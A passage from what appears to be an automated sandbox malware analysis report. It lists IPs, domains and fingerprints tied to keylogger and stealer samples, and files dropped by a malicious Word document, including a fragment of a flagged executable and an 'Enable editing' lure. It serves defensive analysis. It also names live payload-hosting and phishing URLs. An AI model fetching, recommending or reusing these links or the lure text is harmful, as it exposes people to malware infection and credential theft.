                                                                                                              12:08:08API Interceptor14x Sleep call for process: powershell.exe modified

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              132.226.8.169Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              01831899-1 FDMS3008SDC.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              PO NO170300999.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              z25Solicituddecotizacion.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Transaction_copy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              DHL Delivery Invoice.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Bank Swift Copy 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              #U304a#U898b#U7a4d#U4f9d#U983c#U3001_20241113.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              149.154.167.220file.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                                INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                            Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  188.114.97.3PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                                                  QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                                                  http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                  • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                                  gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                                                  Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                  • gmtagency.online/api/check
                                                                                                                                  View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htmGet hashmaliciousUnknownBrowse
                                                                                                                                  • f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
                                                                                                                                  SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                  • paste.ee/d/YU1NN
                                                                                                                                  TT copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.lnnn.fun/u5w9/
                                                                                                                                  QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • filetransfer.io/data-package/iiEh1iM3/download
                                                                                                                                  Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • paste.ee/d/dc8Ru

                                                                                                                                  Domains

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  reallyfreegeoip.orgRef#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  Kayla Dennis CV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  PROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  New Order_20241711.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  checkip.dyndns.comCompany catalog profile.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 132.226.8.169
                                                                                                                                  Quote GVSE24-00815.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  Payment_transaction.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  nowe zam#U00f3wienie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 193.122.130.0
                                                                                                                                  Kayla Dennis CV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  PROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  api.telegram.orgfile.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220

                                                                                                                                  ASNs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  TELEGRAMRUfile.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  CLOUDFLARENETUShttps://svmr0.mjt.lu/lnk/AV8AAFaSoSIAAAAAAAAAA8n01EsAAYKIu-wAAAAAACvDuABnPFfPAMaNPXPJSsuYiTwyR3BbogAoa9Y/1/kV4e_y8Blrzf3PPyRcwmxA/aHR0cHM6Ly9nb29nbGUuY29tL2FtcC9zL25hM3NpZ24uc2JzL2xaOUJhVks4Vks4TEg2clZLOFIxNW5RMDdsWjlCYVZLOFZLOExINnJWSzhSMTVuSlgzWjlCUjE1V1BZGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  NW_EmployerNewsletter_11142024_pdf.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                  • 1.1.1.1
                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                  • 172.64.41.3
                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  https://nam.dcv.ms/WLtyQ3priBGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                  • 104.17.25.14
                                                                                                                                  http://itrack4.valuecommerce.ne.jp/cgi-bin/2366370/entry.php?vc_url=http://serviceoctopus.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                  • 104.17.25.14
                                                                                                                                  MVV ALIADO - S-REQ-19-00064 40ft 1x20.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                  • 172.67.74.152
                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.81.208
                                                                                                                                  https://go.smarticket.co.il/ls/click?upn=u001.fgiCeFBep9-2Bp-2BI-2FBS-2FQzpC2xjyJy-2F3Vyk7Il68bLLvPtf3ylvqCBA6C4EKNjzvjnO7DmxwgRAXuVTKqXeWWK-2FRyQMKjq9z-2BeZ1OwQD7V12gscv6zX7-2Fcxb55J0EV8f1Ampt81io8dhDiURp87hwByg-3D-3DPZ85_0T32ClFdYnPySZLQz4syRr7AwaED9TGwCQfdVJE24C8qx-2FghFyENLTwUUG0FX6F78aPynA7LKVT6R5ntoQlQZb9fRs8iNVA2HWvcmmoeVoX5U4BkQXE1rGek-2BllU6xjoddV3OqcFS-2BzUe7QEf-2FVzWmQq7Hr-2FUf1AtbONCJrBpjucqxB4DYLng3LY-2BDrUntPLxYfeHfTgJA-2BRFnv1g1-2FOyg-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                  • 172.67.24.131
                                                                                                                                  Toolly.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 172.67.204.34
                                                                                                                                  UTMEMUSCompany catalog profile.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 132.226.8.169
                                                                                                                                  Quote GVSE24-00815.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  Payment_transaction.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  nowe zam#U00f3wienie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  Kayla Dennis CV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  New Order_20241711.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  SHARCOM-ASBGSOA.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                  • 87.120.84.39
                                                                                                                                  Bank Swift Copy 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 87.120.84.39
                                                                                                                                  blhbZrtqbLg6O1K.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 87.120.84.39
                                                                                                                                  Payment Copy.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 87.120.84.39
                                                                                                                                  2 Payment Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 87.120.84.39
                                                                                                                                  ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 87.120.84.38
                                                                                                                                  RFQ_PO_091232.docGet hashmaliciousNanocoreBrowse
                                                                                                                                  • 87.120.84.38
                                                                                                                                  LkUJU0rsxdoNTRjxlZ5e0rZRO3rOY4rKRo.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 87.120.84.230
                                                                                                                                  wsaySOikSR3afBEBBbLelehAkQc8MFUcQx.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 87.120.84.230
                                                                                                                                  m1TuocfCMhon01ZDYjxrTEWsmYdVD8FZ4k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 87.120.84.230

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  05af1f5ca1b87cc9cc9b25185115607d#U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  INV-#000497053.docGet hashmaliciousUnknownBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  http://xoilacxd.ccGet hashmaliciousUnknownBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  Bank Swift Copy 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  36f7277af969a6947a61ae0b815907a12024-HRDCL-0000796.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  2024-HRDCL-0000796.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  DHL Shipment DOCs_002.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  DHL Shipment DOCs_002.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Bank Swift Copy 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  blhbZrtqbLg6O1K.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Payment Copy.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220

                                                                                                                                  Dropped Files

                                                                                                                                  No context

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):64
                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                  Preview:@...e...........................................................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):837120
                                                                                                                                  Entropy (8bit):7.96907229026701
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:zb3VKo7/7uh5twavgmhh4rdOxHOizP3Api7EO2jLW1mmxj0A57l3j4iRlKKAg:zbco7jo5p4CKdOx93HeLGaE7xj40l2
                                                                                                                                  MD5:9D980CAD65D26D5E36BD306044B26AC9
                                                                                                                                  SHA1:80E09457252563A7EC99095364FD1A9FB3D3F27D
                                                                                                                                  SHA-256:A460050185C6DF524792697A1B751A2FB309939E5A34D135459D4A6DBBD66EE0
                                                                                                                                  SHA-512:887FA68F650484950EDFF6C562F24491B286F10806A0AAEB9163076866D878E6B0D54F2B1B2FBC8EFFF98F65451EEEAAA4914C7F86B57FBBD7775BDD571F2728
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<g..............0......"........... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc............ ..................@..@.reloc..............................@..B.......................H.......h^...6......D........*...........................................0..]..........7...%.r...p.%...%.r...p.%...%.r...p.(....(......s.............o......o.........,..o......*.........2..Q.......0..a..........7...%.r...p.%...%.r...p.%...%.r...p.(....(......s.......o...........o.........,..o........+..*.........2..P.......0..B........r...p.rA..p(....(......s.............o .....o.........,..o......*...........6.......0..F........r...p.rA..p(....(......s.......o!..........o...

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{CBB6C114-22C0-4E8C-812B-10640C9DABC0}.tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):16384
                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3::
                                                                                                                                  MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                                                                  SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                                                                  SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                                                                  SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{502A34A8-C460-4074-8066-FA66CCE00E5D}.tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1536
                                                                                                                                  Entropy (8bit):1.357318797251612
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbj:IiiiiiiiiifdLloZQc8++lsJe1Mzml/
                                                                                                                                  MD5:575B3C3FA4B9E4CF996B44132727539D
                                                                                                                                  SHA1:99FF76D9C349FA4FB08864BAA1A711FBFED271BD
                                                                                                                                  SHA-256:EE06644488C49AD3F85A566034D8518D2D301C11EC5A31E93398518785B2CF96
                                                                                                                                  SHA-512:E06DF79FE8A2B1348FD44DFF1680404BB9A8F2D33C221A710780D32867D590371D131D6B70BA4AA2BEC4A41149B598F5723FB5B69437F0E26C3CABC0B6F5C4F4
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A0F671BC-384D-4C76-B9D0-6C0270962DCC}.tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1024
                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C6543D4A-93B1-45DF-9157-D796FE9EF544}.tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):153088
                                                                                                                                  Entropy (8bit):3.5592781508910143
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:UyemryemryemryemryemryemryemryemJwCId:Uyemryemryemryemryemryemryemryel
                                                                                                                                  MD5:5A9B00CE4762463AB4D9B4E3C346D228
                                                                                                                                  SHA1:2C72A7863C9817CA36C1337B69A84C347E59EFD2
                                                                                                                                  SHA-256:3F6298C8BB930EA27A04EB00BA0BF0345784BCEFE3444BBC38AF9FAF7D6E05D6
                                                                                                                                  SHA-512:C8EFE61E9BB77240549F3D837E0B435D87E48AAA7276564F973BC5629F611BD0AF85229A9C99B62C0719ED9C570D51A636535C96523048544D886C07A6F278B5
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:3.8.5.0.2.6.6.4.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                                                                                                                  C:\Users\user\AppData\Local\Temp\2fgbchjd.wx5.psm1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1
                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:1

                                                                                                                                  C:\Users\user\AppData\Local\Temp\obnb3a4t.cfs.ps1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:very short file (no magic)
